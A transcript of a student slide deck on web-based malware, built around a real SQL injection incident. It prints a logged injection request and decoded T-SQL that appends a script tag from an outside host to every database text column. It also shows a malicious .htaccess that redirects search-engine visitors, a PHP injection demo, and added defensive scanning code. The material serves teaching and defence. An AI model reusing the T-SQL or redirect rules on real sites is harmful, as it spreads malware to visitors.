Web-Based Malware Menace Spreading Fast - PowerPoint PPT Presentation

Slides: 32
Provided by: KelleyGam

1
Web-Based Malware Menace Spreading Fast
Presented By
  • Garry Bennett
  • Marcelo Berger
  • Kelley Gambera
  • Elsa Madrigal
  • David Pessis
  • Chuck Roth
  • Fred Salchli

2
Malware Behavior is Changing
  • Malware no longer exclusive to malicious sites
  • Malware making its way to end user machine with
    no user interaction required
  • Malware establishing presence on end user machine
  • There has been explosive growth in new malicious
    code signatures

Table 1. New malicious code signatures (Source:
Symantec Corporation)
3
Interesting Trends
  • Malware is targeting mainstream sites
  • In 2008, Economist.com and MLB.com were both hit
  • Malware authors used DoubleClick's ad-serving
    software
  • Unsuspecting users clicked on what looked to be
    legitimate ads, but were actually clicking on a
    Trojan which installed itself on the user's hard
    drive to collect personal information
  • Malware authors are now looking for a bigger
    audience
  • Mainstream sites provide this base
  • Users who go to these sites are less likely to be
    concerned about being the victim of malware
    attack
  • This is an increasing problem since the notion of
    being safe if one visits good sites no longer
    holds true
  • Web servers have evolved into complex code
  • No longer a static page
  • Third-party hosted material
  • Network layer communication and exposed weakness

4
Attack Techniques
  • SQL injection
  • Malicious advertisements
  • Search engine result redirection
  • Attacks on backend virtual hosting companies
  • Vulnerabilities in Web server or forum hosting
    software
  • Cross-site scripting (XSS) attacks

5
Attacks Not Mentioned in Paper
  • Sniffing / interception (HTTP vs. HTTPS)
  • DNS server vulnerability exploits, which allow
    malicious sites to be served
  • Authenticity Attacks

6
More Popular Attack Techniques: SQL Injection
  • Large, high-traffic sites have databases running
    in background
  • Read/write user interaction
  • Security must extend to databases and data
  • How it works
  • Identifies input form vulnerabilities
  • Hacker inserts additional SQL instructions
  • Hacker can then navigate the database and add
    malicious content
  • Hidden links
  • E.g. Trojan.Asprox

7
SQL Injection Attack at Duo!
  • Longstanding Client
  • Client merged with another company that had an
    existing e-commerce application
  • We hesitantly agreed to integrate and host the
    e-commerce application
  • Code review and testing indicated security
    problems
  • Client pushed back on risk assessment and claimed
    e-commerce site would be retired in very near
    future
  • Two years later ...

8
SQL Injection
  • First Order Attack
  • Attacker gains access to the database and can
    perform DML and/or DDL commands
  • Second Order Attack
  • Attacker inserts data into the database
  • Our attacker did both
  • Client called to report strange links appearing
    within the product pages of their site

9
SQL Injection: Raw IIS Log
    2008-04-12 17:59:39 W3SVC658304687 WEB14A POST
    /productcart/pc/viewCat_P.asp idCategory=57;DECLARE @S NVARCHAR(4000);SET @S=
    CAST(0x[hex-encoded payload omitted here; the decoded T-SQL is on the next two slides]
    AS NVARCHAR(4000));EXEC(@S)-- 80 - 125.65.77.25 HTTP/1.0
    Mozilla/3.0+(compatible;+Indy+Library) - - www.clientname.com 200 0 0 471 2377 2562
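An added example, not from the presentation, of the check a defender would run over IIS logs for this pattern: it parses the W3C fields, flags any request whose query string carries a hex-encoded CAST(...) handed to EXEC, and decodes the hex as UTF-16LE, which is how NVARCHAR interprets it. The two sample lines are constructed in the shape of the log above with a short stand-in payload and documentation IP addresses; the field order is assumed to match that log.

```python
import re

# IIS W3C field order assumed here (it matches the slide-9 log line); later
# fields such as cs(Referer), cs-host and sc-status are not needed for the check.
FIELDS = ["date", "time", "site", "computer", "method", "uri_stem", "uri_query",
          "port", "user", "client_ip", "version", "user_agent"]

# Shape of the injection on slides 9-11: T-SQL hidden as hex inside
# CAST(0x... AS NVARCHAR(n)) and run with EXEC. IIS logs a space as '+'.
CAST_RE = re.compile(r"CAST\(0x([0-9A-Fa-f]+)[+ ]+AS[+ ]+NVARCHAR\(\d+\)\)", re.I)
EXEC_RE = re.compile(r"EXEC\(@\w+\)", re.I)

def decode_hex_payload(hex_text: str) -> str:
    """CAST(0x.. AS NVARCHAR) reads the bytes as UTF-16LE; pad a truncated odd-length blob."""
    raw = bytes.fromhex(hex_text)
    if len(raw) % 2:
        raw += b"\x00"
    return raw.decode("utf-16-le", errors="replace")

def scan_iis_log(log_text: str) -> list:
    """One finding per request whose query string carries a hex-encoded EXEC payload."""
    findings = []
    for line in log_text.splitlines():
        parts = line.split(" ")
        if not line or line.startswith("#") or len(parts) < len(FIELDS):
            continue  # blank lines, '#Fields:' headers, truncated lines
        rec = dict(zip(FIELDS, parts))
        m = CAST_RE.search(rec["uri_query"])
        if m and EXEC_RE.search(rec["uri_query"]):
            findings.append({"client_ip": rec["client_ip"], "uri_stem": rec["uri_stem"],
                             "user_agent": rec["user_agent"],
                             "decoded_sql": decode_hex_payload(m.group(1))})
    return findings

# Constructed sample: a normal request, then one shaped like slide 9; the stand-in
# payload is much shorter than the page's but encoded exactly the same way.
STANDIN_SQL = ("DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR "
               "select a.name,b.name from sysobjects a,syscolumns b")
STANDIN_HEX = STANDIN_SQL.encode("utf-16-le").hex().upper()
SAMPLE_LOG = (
    "2008-04-12 17:58:02 W3SVC658304687 WEB14A GET /productcart/pc/viewCat_P.asp idCategory=57 "
    "80 - 198.51.100.7 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+7.0) - - www.clientname.com 200 0 0 8123 401 15\n"
    "2008-04-12 17:59:39 W3SVC658304687 WEB14A POST /productcart/pc/viewCat_P.asp "
    f"idCategory=57;DECLARE+@S+NVARCHAR(4000);SET+@S=CAST(0x{STANDIN_HEX}+AS+NVARCHAR(4000));EXEC(@S)-- "
    "80 - 203.0.113.25 HTTP/1.0 Mozilla/3.0+(compatible;+Indy+Library) - - www.clientname.com 200 0 0 471 2377 2562\n"
)

if __name__ == "__main__":
    for f in scan_iis_log(SAMPLE_LOG):
        print(f["client_ip"], f["uri_stem"], f["user_agent"], "->", f["decoded_sql"][:60])
```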

10
SQL Injection: 1st Order Attack
    POST /productcart/pc/viewCat_P.asp idCategory=57;
    DECLARE @S NVARCHAR(4000);SET @S=CAST(
    (payload decoded from the hex:)
    DECLARE @T varchar(255),@C varchar(255)
    DECLARE Table_Cursor CURSOR FOR
    select a.name,b.name
    from sysobjects a,syscolumns b
    where a.id=b.id and a.xtype='u' and (b.xtype=99
    or b.xtype=35 or b.xtype=231 or b.xtype=167)
    AS NVARCHAR(4000));EXEC(@S)--

11
SQL Injection: 2nd Order Attack
    OPEN Table_Cursor
    FETCH NEXT FROM Table_Cursor
    INTO @T,@C WHILE(@@FETCH_STATUS=0)
    BEGIN exec('update ['+@T+']
    set ['+@C+']=
    rtrim(convert(varchar,['+@C+']))+
    ''<script src=http://www.axxxr.com/1.js></script>'
    '')
    FETCH NEXT FROM Table_Cursor INTO @T,@C
    END
    CLOSE Table_Cursor
    DEALLOCATE Table_Cursor

12
SQL Injection Remediation
  • We immediately shut down the application
  • We built a scrubber which scanned database tables
    for signature and removed malicious calls
  • E-commerce site was disintegrated from main site
  • Unhappy client, unhappy service provider
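The remediation slide mentions a scrubber that scanned the database tables for the signature and removed it. Below is an added example of such a scrubber written for this page (not Duo's code): it uses an in-memory SQLite database with constructed rows in place of the SQL Server tables, and mirrors the attack's own approach of walking every text-typed column of every user table. The signature pattern uses the redacted host from slide 11 and is an assumption.

```python
import re
import sqlite3

# Signature of the tag the second-order attack appended (domain redacted on slide 11
# as axxxr); pass a different compiled pattern for another host.
INJECTED_TAG = re.compile(r"<script\s+src=http://www\.axxxr\.com/1\.js></script>", re.I)

def text_columns(conn):
    """(table, column) pairs for every text-typed column of every user table."""
    # The attack picked SQL Server xtype 99/35/231/167 (ntext, text, nvarchar, varchar);
    # here we take any SQLite column whose declared type mentions CHAR, TEXT or CLOB.
    cols = []
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type='table' AND name NOT LIKE 'sqlite_%'")]
    for t in tables:
        for _cid, name, ctype, *_rest in conn.execute(f'PRAGMA table_info("{t}")'):
            if any(k in (ctype or "").upper() for k in ("CHAR", "TEXT", "CLOB")):
                cols.append((t, name))
    return cols

def scrub(conn, pattern=INJECTED_TAG):
    """Strip the signature from every text column; returns {(table, column): rows_changed}."""
    fixed = {}
    for t, c in text_columns(conn):
        rows = conn.execute(f'SELECT rowid, "{c}" FROM "{t}" WHERE "{c}" LIKE ?',
                            ("%<script%",)).fetchall()   # cheap pre-filter before the regex
        changed = 0
        for rowid, val in rows:
            clean = pattern.sub("", val)
            if clean != val:
                conn.execute(f'UPDATE "{t}" SET "{c}" = ? WHERE rowid = ?', (clean, rowid))
                changed += 1
        if changed:
            fixed[(t, c)] = changed
    conn.commit()
    return fixed

def build_sample_db():
    """Constructed catalogue after the attack: the tag sits at the end of text values."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products(id INTEGER PRIMARY KEY, name VARCHAR(255), descr TEXT, price REAL);
        CREATE TABLE categories(id INTEGER PRIMARY KEY, title NVARCHAR(100));
    """)
    tag = "<script src=http://www.axxxr.com/1.js></script>"
    conn.executemany("INSERT INTO products(name, descr, price) VALUES (?, ?, ?)", [
        ("Widget" + tag, "A fine widget" + tag, 9.99),
        ("Gadget" + tag, "Untouched description", 19.5)])
    conn.execute("INSERT INTO categories(title) VALUES (?)", ("Tools" + tag,))
    return conn
```

Running `scrub` a second time returns an empty dict, which is the check that the data is clean before the application is brought back up.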

13
More Popular Attack Techniques: Malicious Ads
  • Malware delivered via what appears to be real ad
  • Issues
  • Not all advertisers validate the ads hosted on
    legitimate sites
  • The nature of advertising/online publishing
    mechanisms is dynamic and automated, thus
    difficult to trace
  • Authored using JavaScript
  • Functions can be easily misused to silently
    redirect user to malicious page regardless if
    hosting site remains clean
  • Ads are hard to detect because they quickly
    rotate
  • Rotate based on search parameters and/or end-user
    geography
  • Web site and ad publishers are unaware that ads
    contain malware

14
More Popular Attack Techniques: Malicious Ads
  • How Malicious ads work
  • Pop up over a web site and redirect user to web
    page filled with malicious software
  • Entices user to click a link, which results in
    loading of malicious web site
  • Auto-redirects often utilize Flash technology
    whereas click-throughs use JavaScript or ActiveX
    to create pop up with clickable options

Additional Source: Smart Computing, "How to Get
Rid of Malicious Ads", May 2008,
http://www.smartcomputing.com/editorial/article.asp?article=articles%2F2008%2Fs1905%2F25s05%2F25s05.asp
15
More Popular Attack Techniques: Search Engine
Result Redirection
  • Poisoned keywords related to popular searches
  • Metatags in web pages used to perform search
    engine optimization
  • Example: "Easter verse", "Easter verse poems",
    "Easter greeting card verses"
  • Re-directs to malware sites
  • Malware is downloaded
  • Misleading apps are downloaded: anti-virus,
    Windows updates, etc.
  • Detection avoidance
  • Referrer checking: avoids researchers who could be
    investigating the referral to the site
  • Modify HTTP headers to avoid caching of pages
  • No-store, No-cache

Source: http://cyberinsecure.com/easter-related-search-engine-results-poisoned-redirect-users-to-malicious-applications/
16
More Popular Attack Techniques: Backend Virtual
Hosting Companies
  • Virtual hosting companies provide Web server
    hosting services to other companies or
    individuals
  • Attacking virtual hosts provides hackers with an
    avenue to infect multiple sites associated with
    the hosts
  • GoDaddy.com DDoS attack: hackers knocked down a
    number of client Web sites for several hours in
    2007
  • Techniques for compromising legitimate client Web
    sites
  • Exploit applications on host to inject malicious
    code (HTML iframes), and host then injects same
    code into client sites
  • DNS Spoofing attack using virtual Host name

17
How Malware Authors Reach Users
  • Get on to the user's computer automatically
  • DNS cache poisoning
  • Drive by download
  • Software vulnerabilities
  • Web attack toolkits
  • Cat and mouse game
  • Obfuscation
  • Dynamically changing URLs and malware
  • Clickjacking
  • Get on to the user's computer with help from the
    user
  • Fake codec
  • Malicious P2P files
  • Mal ads
  • Fake scanner web page
  • Blogs

18
Drive By Download
  • User just browses site and executable content is
    auto-downloaded onto user computer without their
    knowledge
  • True four years ago; browsers are more defensive
    today
  • Degrees of insecurity according to corporate
    policies
  • Some apps only supported by older browser
    versions
  • No user interaction required
  • Good web sites are targeted by attackers to
    establish user trust
  • Issue
  • OS and browser may have latest patches but
    multimedia plug-ins and doc viewers are out of
    date and vulnerable
  • Attack method
  • Hidden IFrame causes the user's browser to
    silently pull malicious content
  • Malware authors are then able to exploit OS,
    browser, etc. vulnerabilities and eventually pull
    personal information

Entire attack is invisible to user
19
Other Automatic Attack Methods
  • Software vulnerabilities
  • Bugs or flaws in applications
  • Attacker can compromise system on which software
    is installed
  • Web attack toolkits
  • Off-the-shelf software written to probe a user's
    computer and automatically exploit security holes
  • Obfuscation
  • Encryption of malcode, typically in JavaScript
  • Dynamically changing URLs and malware
  • Malicious domains which appear to be real ones
    associated with search engine statistics
  • Clickjacking
  • Attacker puts invisible layer on Web page and
    user unknowingly clicks fake buttons, links to
    malware

20
Older Detection Techniques No Longer Work
  • Older, signature-based antivirus-only detection
    techniques are far less effective
  • Multimedia, reader, browser, and third-party
    software vulnerabilities are hard to detect using
    traditional virus signatures
  • Traditional antivirus software only knows how to
    search in files, not network traffic
  • Attacks are invisible
  • New methods for detection are necessary
  • Security is heavily dependent on users' habits,
    i.e. users need to keep up with patches, security
    updates, etc.
  • Security lockdown is practiced by website owners
    who have high stakes in secure web transactions

21
User-Assisted Attack Methods
  • Social engineering
  • People are tricked into performing actions
  • Examples
  • Fake codec
  • Software that can decode a binary file and
    reconstitute a version of the original audio or
    video
  • Tempting content gives malware authors the
    ability to get users to install new codec to
    reach desired content
  • Screenshot shows a fake codec to install for a
    video, but instead it's malware
  • Trojan is installed and infects the user's
    computer
  • Malicious P2P files
  • Files using celebrity names or popular brand names

22
User-Assisted Attack Methods (cont'd)
  • Examples
  • Malicious ads
  • One of the most blatant techniques
  • Direct advertisement of malware to unsuspecting
    users (in contrast to using actual
    product/company names)
  • E.g. Fake copy of a newly-released game
  • Fake scanner web page
  • Leverage JavaScript capabilities of a browser
  • Content appears to be legitimate OS alert
    notification
  • A scare tactic approach to get users to execute
    malware
  • Blogs
  • Bogus links which point to malware

23
Symantec Top Web Threats 2008
  • Drive-by downloads
  • Obfuscation
  • Targeting browser plug-ins instead of just
    browser
  • Misleading apps
  • SQL injection in mainstream sites
  • Unique and targeted malware
  • Polymorphing Tools

24
New Threats for 2009 and Beyond
  • Bogus services
  • Legal, financial, car transport
  • Mule recruitment sites
  • Spam
  • Professional-looking sites
  • Social networking vulnerabilities with Web 2.0
  • Hacked accounts
  • Cross-Site Scripting (XSS)
  • Cross Site Request Forgery (CSRF)
  • Phishing
  • Information Leakage
  • Injection flaws (JavaScript, XML, XPath, JSON)
  • Information integrity (i.e. wrong entries on
    Wikipedia)
  • Insufficient anti-automation: vulnerable to brute
    force and CSRF attacks
  • High-visibility news events
  • Quick distribution of malware
  • Replacement of email attachments with hyperlinks

Twitter CSRF Attack
Source: Top Web 2.0 Security Threats, Secure
Enterprise 2.0 Forum
25
Methods of Defense
  • Techniques for Counter-Acting Web-based Attacks
  • User awareness (don't click on anything funny)
  • Don't download apps you don't trust
  • Keep your OS updated
  • Use anti-phishing, anti-malware and anti-spam
    software

No single silver bullet, just a bunch of silver
BBs
26
Garry's Slides
27
SQL Injection Example
    // a good user's name
    $name = "timmy";
    $query = "SELECT * FROM customers WHERE username = '$name'";
    echo "Normal: " . $query . "<br />";
    // user input that uses SQL Injection
    $name_bad = "' OR 1'";
    // our MySQL query builder, however, not a very safe one
    $query_bad = "SELECT * FROM customers WHERE username = '$name_bad'";

28
SQL Injection Example - Cont.
    // display what the new query will look like, with injection
    echo "Injection: " . $query_bad;
  Output:
    Normal: SELECT * FROM customers WHERE username = 'timmy'
    Injection: SELECT * FROM customers WHERE username = '' OR 1''

29
More Popular Attack Techniques: Search Engine
Results Redirection
  • Legitimate sites that have been hacked to
    redirect to various rogue anti-malware scan
    sites
  • The malicious redirect only occurs when a user
    arrives at the site via search engine results
  • Visiting the sites directly (i.e. via a bookmark
    or manually entering the address) results in no
    redirect
  • Site owners visiting their site directly won't
    see any evidence of the redirect
  • Since many sites receive a majority of their
    traffic from search engines, that large majority
    of users will keep getting redirected to the
    malicious site

30
More Popular Attack Techniques: Search Engine
Result Redirection Example
  • The root cause of many of these hacks is a
    maliciously modified .htaccess file, commonly
    used on Apache web servers
    RewriteEngine On
    RewriteCond %{HTTP_REFERER} .*google.* [NC,OR]
    RewriteCond %{HTTP_REFERER} .*yahoo.* [NC,OR]
    RewriteCond %{HTTP_REFERER} .*msn.* [NC,OR]
    RewriteCond %{HTTP_REFERER} .*ask.* [NC,OR]
    RewriteCond %{HTTP_REFERER} .*aol.* [NC,OR]
    RewriteCond %{HTTP_REFERER} .*altavista.* [NC,OR]
    RewriteCond %{HTTP_REFERER} .*netscape.* [NC]
    ...
    RewriteRule .* http://badsite-omitted/ [R=301,L]
  • In some cases it's replaced completely, in other
    cases the bad rules are added to the existing
    contents.
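As an added example (not part of the slides), an audit check a site owner can run against their own .htaccess for the referrer-gated redirect shown above, which is also the referrer-checking evasion from slide 15: it flags a RewriteRule that sends visitors to a host you do not own whenever its preceding RewriteCond lines key on a search-engine Referer. The sample .htaccess is constructed; the SEARCH_ENGINES list and the placeholder target host are assumptions.

```python
import re

# Referrer-gated redirect, the pattern on slide 30: RewriteCond lines testing
# %{HTTP_REFERER} for search-engine names, then a RewriteRule that leaves the site.
SEARCH_ENGINES = ("google", "yahoo", "msn", "ask", "aol", "altavista", "netscape", "bing")
COND_RE = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)\s*(?:\[([^\]]*)\])?", re.I)
RULE_RE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)\s*(?:\[([^\]]*)\])?", re.I)

def find_referrer_cloaking(htaccess: str, own_hosts=()) -> list:
    """One finding per RewriteRule whose condition block keys on a search-engine
    Referer and whose target is an absolute URL on a host not in own_hosts."""
    findings, pending = [], []
    for lineno, line in enumerate(htaccess.splitlines(), 1):
        m = COND_RE.match(line)
        if m:
            pattern = m.group(1).lower()
            if any(engine in pattern for engine in SEARCH_ENGINES):
                pending.append((lineno, m.group(1)))
            continue
        m = RULE_RE.match(line)
        if m:
            target = m.group(2)
            host = re.match(r"https?://([^/]+)", target, re.I)
            if pending and host and host.group(1).lower() not in own_hosts:
                findings.append({"rule_line": lineno, "target": target,
                                 "engines_matched": [p for _, p in pending]})
            pending = []  # a RewriteRule consumes its RewriteCond block
        elif line.strip() and not line.lstrip().startswith("#"):
            pending = []  # any other directive breaks a RewriteCond chain
    return findings

# Constructed .htaccess in the shape shown on the slide (target host is a placeholder).
SAMPLE_HTACCESS = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.* [NC]
RewriteRule .* http://badsite-omitted/ [R=301,L]

# Legitimate rule left by the site owner: canonical host redirect
RewriteCond %{HTTP_HOST} ^example\\.com$ [NC]
RewriteRule ^(.*)$ http://www.example.com/$1 [R=301,L]
"""
```

Because the redirect never fires for a direct visit, this file-level check catches what browsing the site as its owner will not.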

31
More Popular Attack Techniques: Malicious Ads
Example